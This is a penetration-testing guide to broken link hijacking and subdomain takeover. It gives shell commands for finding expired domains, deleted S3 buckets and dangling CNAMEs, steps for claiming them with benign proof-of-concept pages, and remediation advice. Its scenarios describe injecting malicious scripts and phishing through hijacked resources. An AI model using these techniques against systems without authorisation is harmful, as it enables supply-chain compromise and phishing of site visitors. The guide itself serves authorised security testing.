# Exploiting Broken Link Hijacking
## When to Use
- When auditing web applications for references to expired or unclaimed external resources
- During supply chain security assessments of third-party script and resource dependencies
- When testing for subdomain takeover opportunities via dangling CNAME records
- During bug bounty hunting for broken link hijacking vulnerabilities
- When assessing the security of external resource dependencies in production applications
## Prerequisites
- Web crawler or spider for discovering all external links (Burp Suite Spider, Scrapy)
- DNS lookup tools for checking CNAME records and domain availability
- Domain registrar access for claiming expired domains (as proof of concept)
- Understanding of CDN and cloud service provisioning (S3, Azure Blob, GitHub Pages)
- blc (broken-link-checker) or similar tool for automated link validation
- Knowledge of services vulnerable to subdomain takeover (can-i-take-over-xyz)
## Workflow
### Step 1 — Crawl and Extract All External References

```bash
# Use broken-link-checker to find dead links (blc writes to stdout)
npx broken-link-checker http://target.com --recursive --ordered \
  --exclude-internal --filter-level 3 > broken_links.txt

# Extract all absolute links from the page source
curl -s http://target.com | grep -oP "https?://[^\"'\s>]+" | sort -u > all_links.txt

# Extract externally hosted JavaScript sources (absolute URLs only, so
# relative same-origin paths are not misreported as external)
curl -s http://target.com | grep -oP 'src="https?://[^"]*"' | grep -v target.com > external_scripts.txt

# Extract externally hosted CSS references
curl -s http://target.com | grep -oP 'href="https?://[^"]*\.css"' | grep -v target.com > external_css.txt

# Use the Wayback Machine for historical external references
curl -s "https://web.archive.org/web/timemap/link/http://target.com" | \
  grep -oP 'https?://[^>]+' | sort -u > historical_links.txt
```

To spider with Burp Suite, configure the crawl scope to include target.com, then review the Site Map and filter for out-of-scope hosts to list all external references.
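Step 2 below reads an `external_domains.txt` file that none of the commands above produce; a minimal sketch deriving it from `all_links.txt` (filenames and `target.com` are this document's placeholders):

```shell
# Reduce the URL list to unique external hostnames for the whois loop
# in Step 2, dropping the target's own domain and its subdomains.
extract_domains() {
  sed -E 's#^https?://([^/:]+).*#\1#' | grep -vE '(^|\.)target\.com$' | sort -u
}

# Usage (with the file produced in Step 1):
# extract_domains < all_links.txt > external_domains.txt
```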
### Step 2 — Identify Dead or Claimable Resources

```bash
# Check whether external domains are still registered (whois output
# wording varies by TLD; these patterns cover common registries)
for domain in $(cat external_domains.txt); do
  whois "$domain" 2>/dev/null | grep -qi "no match\|not found\|available" && \
    echo "[CLAIMABLE] $domain"
done

# Check HTTP status of external links (000 = DNS/connection failure)
while read -r url; do
  status=$(curl -o /dev/null -s -w "%{http_code}" "$url" --max-time 5)
  if [ "$status" = "000" ] || [ "$status" = "404" ]; then
    echo "[DEAD] $url (Status: $status)"
  fi
done < all_links.txt

# Check for dangling CNAME records
for sub in $(cat subdomains.txt); do
  cname=$(dig +short CNAME "$sub")
  if [ -n "$cname" ]; then
    resolved=$(dig +short "$cname")
    if [ -z "$resolved" ]; then
      echo "[DANGLING] $sub -> $cname (UNRESOLVED)"
    fi
  fi
done
```
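A dangling CNAME is only exploitable if what it points to is claimable; the strongest case is when the apex domain of the CNAME target is itself unregistered. A rough sketch (naive apex extraction that keeps the last two labels, so it is wrong for multi-label public suffixes like co.uk):

```shell
# cname_apex: strip dig's trailing dot and keep the last two labels
# of each hostname on stdin.
cname_apex() {
  sed 's/\.$//' | awk -F. 'NF >= 2 {print $(NF-1) "." $NF}'
}

# Usage: whois the apex of each dangling CNAME target, e.g.
# dig +short CNAME old.target.com | cname_apex | xargs whois | grep -i "no match"
```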
```bash
# Check cloud resource availability (AWS S3 bucket; needs AWS CLI credentials)
aws s3 ls s3://target-assets 2>&1 | grep -q "NoSuchBucket" && echo "[CLAIMABLE] S3: target-assets"
```
### Step 3 — Check Service-Specific Takeover Possibilities

```bash
# GitHub Pages: CNAME points to <user>.github.io and the page 404s
curl -s https://subdomain.target.com | grep -q "There isn't a GitHub Pages site here"

# AWS S3
curl -s http://subdomain.target.com | grep -q "NoSuchBucket"

# Azure Blob Storage
curl -s http://subdomain.target.com | grep -q "The specified container does not exist"

# Heroku
curl -s http://subdomain.target.com | grep -q "No such app"

# Shopify
curl -s http://subdomain.target.com | grep -q "Sorry, this shop is currently unavailable"

# Automated takeover detection with subjack
subjack -w subdomains.txt -c fingerprints.json -t 100 -o takeover_candidates.txt

# nuclei takeover templates over enumerated subdomains
subfinder -d target.com -silent | nuclei -t http/takeovers/ -o takeovers.txt
```
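The per-service curl checks can be folded into a single lookup; a sketch using only the fingerprint strings listed above (a real engagement should use the fuller can-i-take-over-xyz fingerprint set):

```shell
# fingerprint_takeover: read an HTTP response body on stdin and name the
# likely vulnerable service, printing nothing when no fingerprint matches.
fingerprint_takeover() {
  case "$(cat)" in
    *"There isn't a GitHub Pages site here"*)       echo "github-pages" ;;
    *"NoSuchBucket"*)                               echo "aws-s3" ;;
    *"The specified container does not exist"*)     echo "azure-blob" ;;
    *"No such app"*)                                echo "heroku" ;;
    *"Sorry, this shop is currently unavailable"*)  echo "shopify" ;;
  esac
}

# Usage: curl -s http://subdomain.target.com | fingerprint_takeover
```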
### Step 4 — Verify External Script Hijacking

```bash
# Check whether domains serving external JavaScript are available to register
curl -s http://target.com | grep -oP 'src="https?://([^/"]+)' | \
  cut -d'/' -f3 | sort -u | while read -r domain; do
    whois "$domain" 2>/dev/null | grep -qi "no match\|available" && \
      echo "[HIJACKABLE SCRIPT] $domain loaded by target.com"
done

# List npm/CDN package references
curl -s http://target.com | grep -oP 'unpkg\.com/[^@/]+' | sort -u
curl -s http://target.com | grep -oP 'cdn\.jsdelivr\.net/npm/[^@/]+' | sort -u

# Then verify that each referenced package still exists in the npm
# registry, and flag any that are deprecated or removed
```
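Acting on the registry check requires isolating package names from the CDN URLs first; a sketch covering both plain and scoped (`@org/pkg`) names, after which each name can be probed against `https://registry.npmjs.org/<name>`, where a 404 indicates an unpublished or removed package:

```shell
# cdn_pkg_names: extract npm package names from unpkg / jsDelivr URLs
# on stdin, dropping version suffixes and file paths.
cdn_pkg_names() {
  grep -oE '(unpkg\.com|cdn\.jsdelivr\.net/npm)/(@[^/@"]+/)?[^/@"]+' |
    sed -E 's#^(unpkg\.com|cdn\.jsdelivr\.net/npm)/##' | sort -u
}

# Probe the registry (404 => missing; name reuse is subject to npm policy):
# cdn_pkg_names < page.html | while read -r p; do
#   [ "$(curl -s -o /dev/null -w '%{http_code}' "https://registry.npmjs.org/$p")" = 404 ] \
#     && echo "[MISSING PACKAGE] $p"
# done
```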
### Step 5 — Exploit the Broken Link (Authorized Testing Only)

```bash
# Expired domain: register the domain (as proof of concept only)
# Deleted S3 bucket: create a bucket with the same name in the same region
aws s3 mb s3://target-expired-bucket --region us-east-1

# GitHub Pages: create a repository whose Pages site matches the dangling
# CNAME (e.g. an <org>.github.io repository) with proof-of-concept content
# Unclaimed social media: claim the handle and document the takeover

# Serve benign proof-of-concept content from the claimed resource
echo "<html><body><h1>Broken Link Hijacking PoC - [Your Name]</h1></body></html>" > index.html
```
### Step 6 — Assess Impact and Report

Determine impact based on resource type:

- External JavaScript: full XSS on all pages loading the script
- External CSS: UI defacement, data exfiltration via CSS injection
- External image/resource: phishing, tracking
- CNAME subdomain: cookie theft, phishing, OAuth bypass

Then verify the blast radius:

- Check whether the hijacked resource receives cookies scoped to the parent domain
- Check whether the hijacked subdomain appears in an OAuth redirect whitelist
- Verify whether the hijacked domain receives sensitive Referer headers
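The parent-domain cookie check can be done mechanically over captured response headers; a sketch (`target.com` is the placeholder apex, and the apex is interpolated into a regex, which is fine for illustration but not for arbitrary input):

```shell
# cookie_scope_risk: read HTTP response headers on stdin and flag
# Set-Cookie lines whose Domain attribute covers every subdomain.
cookie_scope_risk() {
  apex="$1"
  grep -i '^set-cookie:' | grep -iE "domain=\.?${apex}(;|[[:space:]]|$)" &&
    echo "[IMPACT] cookies scoped to .$apex would reach a hijacked subdomain"
}

# Usage: curl -sI https://target.com/login | cookie_scope_risk target.com
```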
## Key Concepts
| Concept | Description |
|---|---|
| Broken Link Hijacking | Claiming control of an external resource still referenced by the target website |
| Dangling CNAME | DNS CNAME record pointing to an unclaimed or decommissioned service |
| Subdomain Takeover | Claiming a subdomain by provisioning the service its CNAME points to |
| External Script Hijacking | Registering an expired domain that serves JavaScript loaded by the target |
| Supply Chain Attack | Compromising external dependencies to inject malicious content |
| Dead Link | URL reference that returns 404 or fails DNS resolution |
| Resource Fingerprinting | Identifying specific cloud services from error messages and headers |
## Tools & Systems
| Tool | Purpose |
|---|---|
| broken-link-checker | Automated broken link discovery via web crawling |
| subjack | Subdomain takeover detection tool |
| nuclei | Template-based takeover detection scanner |
| can-i-take-over-xyz | Community database of services vulnerable to takeover |
| BadDNS | DNS auditing tool for detecting domain/subdomain takeovers |
| Wayback Machine | Historical URL analysis for discovering past external references |
## Common Scenarios
- JavaScript Supply Chain — Register expired domain that serves JavaScript loaded by target; inject malicious code affecting all visitors
- S3 Bucket Takeover — Claim deleted AWS S3 bucket referenced by target; serve malicious content or steal uploaded data
- GitHub Pages Hijack — Create GitHub Pages repository matching dangling CNAME to serve phishing pages on target subdomain
- Social Media Impersonation — Claim unclaimed social media handles linked from target website for brand impersonation
- CDN Package Hijack — Claim deprecated npm packages referenced via CDN URLs to inject malicious JavaScript
## Output Format

```markdown
## Broken Link Hijacking Report

- **Target**: http://target.com
- **Total External Links**: 145
- **Dead Links**: 12
- **Hijackable Resources**: 3

### Findings

| # | Resource | Type | Status | Impact |
|---|----------|------|--------|--------|
| 1 | analytics.expired-domain.com | JavaScript | Domain available | Full XSS |
| 2 | assets.target.com -> S3 bucket | Static assets | Bucket deleted | Content injection |
| 3 | blog.target.com -> GitHub Pages | Subdomain | No GitHub repo | Subdomain takeover |

### Remediation

- Remove references to decommissioned external resources
- Delete dangling CNAME records for unused subdomains
- Implement Subresource Integrity (SRI) for external scripts
- Regularly audit external dependencies for availability
- Use Content Security Policy to restrict allowed script sources
```
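For the SRI remediation, the `integrity` attribute value is a base64-encoded digest of the exact file contents, which the browser re-verifies on every load, so a hijacked host cannot silently swap the script. A sketch generating the token with openssl:

```shell
# sri_hash: print a sha384 SRI token for a local copy of the script,
# for use as <script integrity="..." crossorigin="anonymous">.
sri_hash() {
  printf 'sha384-%s\n' "$(openssl dgst -sha384 -binary "$1" | openssl base64 -A)"
}

# Usage:
# curl -sO https://cdn.example.com/lib.js && sri_hash lib.js
```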